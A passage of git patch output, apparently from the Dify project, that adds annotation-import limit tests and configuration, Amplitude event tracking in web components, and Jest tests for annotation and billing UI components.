AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Create invalid CSV content + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error message + assert "error_msg" in result + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/docker/.env.example b/docker/.env.example index 0227f75b70..8be75420b1 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -1448,5 +1448,16 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude AMPLITUDE_API_KEY= diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 71c0a5e687..cc17b2853a 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -648,6 +648,12 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} services: From d942adf3b2d701b6458965c070cb4f65042e7ca0 Mon Sep 17 00:00:00 2001 From: Coding On Star <447357187@qq.com> Date: Mon, 15 Dec 2025 15:25:10 +0800 Subject: [PATCH 25/68] feat: Enhance Amplitude tracking across various components (#29662) Co-authored-by: CodingOnStar --- .../components/app/app-publisher/index.tsx | 4 +- .../base/amplitude/AmplitudeProvider.tsx | 42 ++++++++++++++++++- .../create-from-pipeline/list/create-card.tsx | 4 ++ .../list/template-card/index.tsx | 8 +++- .../empty-dataset-creation-modal/index.tsx | 5 +++ .../datasets/create/step-two/index.tsx | 5 +++ .../documents/create-from-pipeline/index.tsx | 5 +++ .../connector/index.tsx | 5 +++ .../plugin-detail-panel/detail-header.tsx | 4 +- .../panel/test-run/preparation/index.tsx | 2 + .../rag-pipeline-header/publisher/popup.tsx | 2 + .../workflow-app/hooks/use-workflow-run.ts | 2 + .../block-selector/tool/action-item.tsx | 5 +++ .../components/workflow/header/run-mode.tsx | 6 +++ .../nodes/_base/hooks/use-one-step-run.ts | 2 + 15 files changed, 96 insertions(+), 5 deletions(-) diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/base/amplitude/AmplitudeProvider.tsx b/web/app/components/base/amplitude/AmplitudeProvider.tsx index 424475aba7..6c378ab64f 100644 --- a/web/app/components/base/amplitude/AmplitudeProvider.tsx +++ b/web/app/components/base/amplitude/AmplitudeProvider.tsx @@ -15,6 +15,43 @@ export const isAmplitudeEnabled = () => { return IS_CLOUD_EDITION && !!AMPLITUDE_API_KEY } +// Map URL pathname to English page name for consistent Amplitude tracking +const getEnglishPageName = (pathname: string): string => { + // Remove leading slash and get the first segment + const segments = pathname.replace(/^\//, '').split('/') + const firstSegment = segments[0] || 'home' + + const pageNameMap: Record = { + '': 'Home', + 'apps': 'Studio', + 'datasets': 'Knowledge', + 'explore': 'Explore', + 'tools': 'Tools', + 'account': 'Account', + 'signin': 'Sign In', + 'signup': 'Sign Up', + } + + return pageNameMap[firstSegment] || firstSegment.charAt(0).toUpperCase() + firstSegment.slice(1) +} + +// Enrichment plugin to override page title with English name for page view events +const pageNameEnrichmentPlugin = (): amplitude.Types.EnrichmentPlugin => { + return { + name: 'page-name-enrichment', + type: 'enrichment', + setup: async () => undefined, + execute: async (event: amplitude.Types.Event) => { + // Only modify page view events + if (event.event_type === '[Amplitude] Page Viewed' && event.event_properties) { + const pathname = typeof window !== 'undefined' ? window.location.pathname : '' + event.event_properties['[Amplitude] Page Title'] = getEnglishPageName(pathname) + } + return event + }, + } +} + const AmplitudeProvider: FC = ({ sessionReplaySampleRate = 1, }) => { @@ -31,10 +68,11 @@ const AmplitudeProvider: FC = ({ formInteractions: true, fileDownloads: true, }, - // Enable debug logs in development environment - logLevel: amplitude.Types.LogLevel.Warn, }) + // Add page name enrichment plugin to override page title with English name + amplitude.add(pageNameEnrichmentPlugin()) + // Add Session Replay plugin const sessionReplay = sessionReplayPlugin({ sampleRate: sessionReplaySampleRate, diff --git a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx index 43c6da0dfc..12008b2d4d 100644 --- a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx @@ -5,6 +5,7 @@ import { useCreatePipelineDataset } from '@/service/knowledge/use-create-dataset import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import Toast from '@/app/components/base/toast' import { useRouter } from 'next/navigation' +import { trackEvent } from '@/app/components/base/amplitude' const CreateCard = () => { const { t } = useTranslation() @@ -23,6 +24,9 @@ const CreateCard = () => { message: t('datasetPipeline.creation.successTip'), }) invalidDatasetList() + trackEvent('create_datasets_from_scratch', { + dataset_id: id, + }) push(`/datasets/${id}/pipeline`) } }, diff --git a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx index cde3bc0e00..a2fe3d164b 100644 --- a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx @@ -19,6 +19,7 @@ import Content from './content' import Actions from './actions' import { useCreatePipelineDatasetFromCustomized } from '@/service/knowledge/use-create-dataset' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type TemplateCardProps = { pipeline: PipelineTemplate @@ -66,6 +67,11 @@ const TemplateCard = ({ invalidDatasetList() if (newDataset.pipeline_id) await handleCheckPluginDependencies(newDataset.pipeline_id, true) + trackEvent('create_datasets_with_pipeline', { + template_name: pipeline.name, + template_id: pipeline.id, + template_type: type, + }) push(`/datasets/${newDataset.dataset_id}/pipeline`) }, onError: () => { @@ -75,7 +81,7 @@ const TemplateCard = ({ }) }, }) - }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList]) + }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList, pipeline.name, pipeline.id, type]) const handleShowTemplateDetails = useCallback(() => { setShowDetailModal(true) diff --git a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx index 12b9366744..29986e4fca 100644 --- a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx +++ b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx @@ -12,6 +12,7 @@ import Button from '@/app/components/base/button' import { ToastContext } from '@/app/components/base/toast' import { createEmptyDataset } from '@/service/datasets' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type IProps = { show: boolean @@ -40,6 +41,10 @@ const EmptyDatasetCreationModal = ({ try { const dataset = await createEmptyDataset({ name: inputValue }) invalidDatasetList() + trackEvent('create_empty_datasets', { + name: inputValue, + dataset_id: dataset.id, + }) onHide() router.push(`/datasets/${dataset.id}/documents`) } diff --git a/web/app/components/datasets/create/step-two/index.tsx b/web/app/components/datasets/create/step-two/index.tsx index 43be89c326..4d568e9a6c 100644 --- a/web/app/components/datasets/create/step-two/index.tsx +++ b/web/app/components/datasets/create/step-two/index.tsx @@ -64,6 +64,7 @@ import { noop } from 'lodash-es' import { useDocLink } from '@/context/i18n' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import { checkShowMultiModalTip } from '../../settings/utils' +import { trackEvent } from '@/app/components/base/amplitude' const TextLabel: FC = (props) => { return @@ -568,6 +569,10 @@ const StepTwo = ({ if (mutateDatasetRes) mutateDatasetRes() invalidDatasetList() + trackEvent('create_datasets', { + data_source_type: dataSourceType, + indexing_technique: getIndexing_technique(), + }) onStepChange?.(+1) if (isSetting) onSave?.() diff --git a/web/app/components/datasets/documents/create-from-pipeline/index.tsx b/web/app/components/datasets/documents/create-from-pipeline/index.tsx index 79e3694da8..eb87c83489 100644 --- a/web/app/components/datasets/documents/create-from-pipeline/index.tsx +++ b/web/app/components/datasets/documents/create-from-pipeline/index.tsx @@ -40,6 +40,7 @@ import UpgradeCard from '../../create/step-one/upgrade-card' import Divider from '@/app/components/base/divider' import { useBoolean } from 'ahooks' import PlanUpgradeModal from '@/app/components/billing/plan-upgrade-modal' +import { trackEvent } from '@/app/components/base/amplitude' const CreateFormPipeline = () => { const { t } = useTranslation() @@ -343,6 +344,10 @@ const CreateFormPipeline = () => { setBatchId((res as PublishedPipelineRunResponse).batch || '') setDocuments((res as PublishedPipelineRunResponse).documents || []) handleNextStep() + trackEvent('dataset_document_added', { + data_source_type: datasourceType, + indexing_technique: 'pipeline', + }) }, }) }, [dataSourceStore, datasource, datasourceType, handleNextStep, pipelineId, runPublishedPipeline]) diff --git a/web/app/components/datasets/external-knowledge-base/connector/index.tsx b/web/app/components/datasets/external-knowledge-base/connector/index.tsx index 33f57d0b47..ec055a049f 100644 --- a/web/app/components/datasets/external-knowledge-base/connector/index.tsx +++ b/web/app/components/datasets/external-knowledge-base/connector/index.tsx @@ -6,6 +6,7 @@ import { useToastContext } from '@/app/components/base/toast' import ExternalKnowledgeBaseCreate from '@/app/components/datasets/external-knowledge-base/create' import type { CreateKnowledgeBaseReq } from '@/app/components/datasets/external-knowledge-base/create/declarations' import { createExternalKnowledgeBase } from '@/service/datasets' +import { trackEvent } from '@/app/components/base/amplitude' const ExternalKnowledgeBaseConnector = () => { const { notify } = useToastContext() @@ -18,6 +19,10 @@ const ExternalKnowledgeBaseConnector = () => { const result = await createExternalKnowledgeBase({ body: formValue }) if (result && result.id) { notify({ type: 'success', message: 'External Knowledge Base Connected Successfully' }) + trackEvent('create_external_knowledge_base', { + provider: formValue.provider, + name: formValue.name, + }) router.back() } else { throw new Error('Failed to create external knowledge base') } diff --git a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx index 197f2e2a92..e1cd1bbcd4 100644 --- a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx +++ b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx @@ -44,6 +44,7 @@ import { AUTO_UPDATE_MODE } from '../reference-setting-modal/auto-update-setting import { convertUTCDaySecondsToLocalSeconds, timeOfDayToDayjs } from '../reference-setting-modal/auto-update-setting/utils' import type { PluginDetail } from '../types' import { PluginCategoryEnum, PluginSource } from '../types' +import { trackEvent } from '@/app/components/base/amplitude' const i18nPrefix = 'plugin.action' @@ -212,8 +213,9 @@ const DetailHeader = ({ refreshModelProviders() if (PluginCategoryEnum.tool.includes(category)) invalidateAllToolProviders() + trackEvent('plugin_uninstalled', { plugin_id, plugin_name: name }) } - }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders]) + }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders, plugin_id, name]) return (
diff --git a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx index c659d8669a..8a1d33b202 100644 --- a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx +++ b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx @@ -21,6 +21,7 @@ import { useDataSourceStore, useDataSourceStoreWithSelector } from '@/app/compon import { useShallow } from 'zustand/react/shallow' import { useWorkflowStore } from '@/app/components/workflow/store' import StepIndicator from './step-indicator' +import { trackEvent } from '@/app/components/base/amplitude' const Preparation = () => { const { @@ -121,6 +122,7 @@ const Preparation = () => { datasource_type: datasourceType, datasource_info_list: datasourceInfoList, }) + trackEvent('pipeline_start_action_time', { action_type: 'document_processing' }) setIsPreparingDataSource?.(false) }, [dataSourceStore, datasource, datasourceType, handleRun, workflowStore]) diff --git a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx index 42ca643cb0..52344f6278 100644 --- a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx +++ b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx @@ -47,6 +47,7 @@ import { useModalContextSelector } from '@/context/modal-context' import Link from 'next/link' import { useDatasetApiAccessUrl } from '@/hooks/use-api-access-url' import { useFormatTimeFromNow } from '@/hooks/use-format-time-from-now' +import { trackEvent } from '@/app/components/base/amplitude' const PUBLISH_SHORTCUT = ['ctrl', '⇧', 'P'] @@ -109,6 +110,7 @@ const Popup = () => { releaseNotes: params?.releaseNotes || '', }) setPublished(true) + trackEvent('app_published_time', { action_mode: 'pipeline', app_id: datasetId, app_name: params?.title || '' }) if (res) { notify({ type: 'success', diff --git a/web/app/components/workflow-app/hooks/use-workflow-run.ts b/web/app/components/workflow-app/hooks/use-workflow-run.ts index 6164969b3d..f051f73489 100644 --- a/web/app/components/workflow-app/hooks/use-workflow-run.ts +++ b/web/app/components/workflow-app/hooks/use-workflow-run.ts @@ -29,6 +29,7 @@ import { post } from '@/service/base' import { ContentType } from '@/service/fetch' import { TriggerType } from '@/app/components/workflow/header/test-run-menu' import { AppModeEnum } from '@/types/app' +import { trackEvent } from '@/app/components/base/amplitude' type HandleRunMode = TriggerType type HandleRunOptions = { @@ -359,6 +360,7 @@ export const useWorkflowRun = () => { if (onError) onError(params) + trackEvent('workflow_run_failed', { workflow_id: flowId, reason: params.error, node_type: params.node_type }) } const wrappedOnCompleted: IOtherOptions['onCompleted'] = async (hasError?: boolean, errorMessage?: string) => { diff --git a/web/app/components/workflow/block-selector/tool/action-item.tsx b/web/app/components/workflow/block-selector/tool/action-item.tsx index 1ca61b3039..2151beefab 100644 --- a/web/app/components/workflow/block-selector/tool/action-item.tsx +++ b/web/app/components/workflow/block-selector/tool/action-item.tsx @@ -13,6 +13,7 @@ import { useTranslation } from 'react-i18next' import useTheme from '@/hooks/use-theme' import { Theme } from '@/types/app' import { basePath } from '@/utils/var' +import { trackEvent } from '@/app/components/base/amplitude' const normalizeProviderIcon = (icon?: ToolWithProvider['icon']) => { if (!icon) @@ -102,6 +103,10 @@ const ToolItem: FC = ({ params, meta: provider.meta, }) + trackEvent('tool_selected', { + tool_name: payload.name, + plugin_id: provider.plugin_id, + }) }} >
diff --git a/web/app/components/workflow/header/run-mode.tsx b/web/app/components/workflow/header/run-mode.tsx index 7a1d444d30..bd34cf6879 100644 --- a/web/app/components/workflow/header/run-mode.tsx +++ b/web/app/components/workflow/header/run-mode.tsx @@ -12,6 +12,7 @@ import { StopCircle } from '@/app/components/base/icons/src/vender/line/mediaAnd import { useDynamicTestRunOptions } from '../hooks/use-dynamic-test-run-options' import TestRunMenu, { type TestRunMenuRef, type TriggerOption, TriggerType } from './test-run-menu' import { useToastContext } from '@/app/components/base/toast' +import { trackEvent } from '@/app/components/base/amplitude' type RunModeProps = { text?: string @@ -69,22 +70,27 @@ const RunMode = ({ if (option.type === TriggerType.UserInput) { handleWorkflowStartRunInWorkflow() + trackEvent('app_start_action_time', { action_type: 'user_input' }) } else if (option.type === TriggerType.Schedule) { handleWorkflowTriggerScheduleRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'schedule' }) } else if (option.type === TriggerType.Webhook) { if (option.nodeId) handleWorkflowTriggerWebhookRunInWorkflow({ nodeId: option.nodeId }) + trackEvent('app_start_action_time', { action_type: 'webhook' }) } else if (option.type === TriggerType.Plugin) { if (option.nodeId) handleWorkflowTriggerPluginRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'plugin' }) } else if (option.type === TriggerType.All) { const targetNodeIds = option.relatedNodeIds?.filter(Boolean) if (targetNodeIds && targetNodeIds.length > 0) handleWorkflowRunAllTriggersInWorkflow(targetNodeIds) + trackEvent('app_start_action_time', { action_type: 'all' }) } else { // Placeholder for trigger-specific execution logic for schedule, webhook, plugin types diff --git a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts index 77d75ccc4f..dad62ae2a4 100644 --- a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts +++ b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts @@ -68,6 +68,7 @@ import { useAllMCPTools, useAllWorkflowTools, } from '@/service/use-tools' +import { trackEvent } from '@/app/components/base/amplitude' // eslint-disable-next-line ts/no-unsafe-function-type const checkValidFns: Partial> = { @@ -973,6 +974,7 @@ const useOneStepRun = ({ _singleRunningStatus: NodeRunningStatus.Failed, }, }) + trackEvent('workflow_run_failed', { workflow_id: flowId, node_id: id, reason: res.error, node_type: data?.type }) }, }, ) From a951f46a093160380aace0f7cc50497913d890db Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 15:38:04 +0800 Subject: [PATCH 26/68] chore: tests for annotation (#29664) --- .../index.spec.tsx | 98 +++++++++++++++++++ .../index.spec.tsx | 98 +++++++++++++++++++ 2 files changed, 196 insertions(+) create mode 100644 web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx create mode 100644 web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) From 2b3c55d95a9c4ee562b86b6275d433988ce2abc6 Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 16:13:14 +0800 Subject: [PATCH 27/68] chore: some billing test (#29648) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: Coding On Star <447357187@qq.com> --- .../billing/annotation-full/index.spec.tsx | 71 +++++++++++ .../billing/annotation-full/modal.spec.tsx | 119 ++++++++++++++++++ .../cloud-plan-item/list/item/index.spec.tsx | 52 ++++++++ .../list/item/tooltip.spec.tsx | 46 +++++++ .../cloud-plan-item/list/item/tooltip.tsx | 4 +- 5 files changed, 291 insertions(+), 1 deletion(-) create mode 100644 web/app/components/billing/annotation-full/index.spec.tsx create mode 100644 web/app/components/billing/annotation-full/modal.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx diff --git a/web/app/components/billing/annotation-full/index.spec.tsx b/web/app/components/billing/annotation-full/index.spec.tsx new file mode 100644 index 0000000000..77a0940f12 --- /dev/null +++ b/web/app/components/billing/annotation-full/index.spec.tsx @@ -0,0 +1,71 @@ +import { render, screen } from '@testing-library/react' +import AnnotationFull from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +describe('AnnotationFull', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + }) + + // Rendering marketing copy with action button + describe('Rendering', () => { + it('should render tips when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + }) + + it('should render upgrade button when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByTestId('upgrade-btn')).toBeInTheDocument() + }) + + it('should render Usage component when rendered', () => { + // Act + render() + + // Assert + const usageComponent = screen.getByTestId('usage-component') + expect(usageComponent).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/billing/annotation-full/modal.spec.tsx b/web/app/components/billing/annotation-full/modal.spec.tsx new file mode 100644 index 0000000000..da2b2041b0 --- /dev/null +++ 